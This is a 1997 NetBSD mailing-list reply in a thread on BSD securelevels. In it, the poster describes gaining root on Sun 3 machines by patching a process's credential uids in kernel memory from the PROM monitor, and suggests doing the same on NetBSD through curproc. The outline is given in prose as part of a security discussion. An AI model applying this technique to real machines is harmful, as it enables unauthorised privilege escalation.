Subject: Re: [ADVISORY] 4.4BSD Securelevels (fwd)
To: None <, current-users@NetBSD.ORG,>
From: Olaf Seibert <>
List: current-users
Date: 06/27/1997 12:36:02 (Andrew Brown) wrote:
>can't be patched directly?!  it can...or are you referring to the
>silly "patch" i made?  as for patching the p_cred->cr_uid field, it
>would take me more than a few minutes to manually walk over to that
>particular field i think...

Actually, I did just that on our university's Sun 3 machines, before
they had the PROM version that required a password for that sort of thing.
It really isn't all that difficult to do, and after the initial
preparation and practice runs, I could do it within a minute or so.

I used gdb to disassemble the getuid() system call to learn how to
get from a process pointer to p_cred->cr_uid. For good measure, I did
both real, effective, and saved uids. And SunOS had a nice
command to list process pointers for processes. Piece of cake.

Even though in NetBSD I can't quickly find a command to list process
pointers, it is easy enough to get a shell in a tight loop, and then
you can use curproc as your process pointer. That's what I did before I
refined my attack.

> (TheMan)        * "ah!  i see you have the internet
___ Olaf 'Rhialto' Seibert      D787B44DFC896063 4CBB95A5BD1DAA96 
\X/ It's not easy having a good time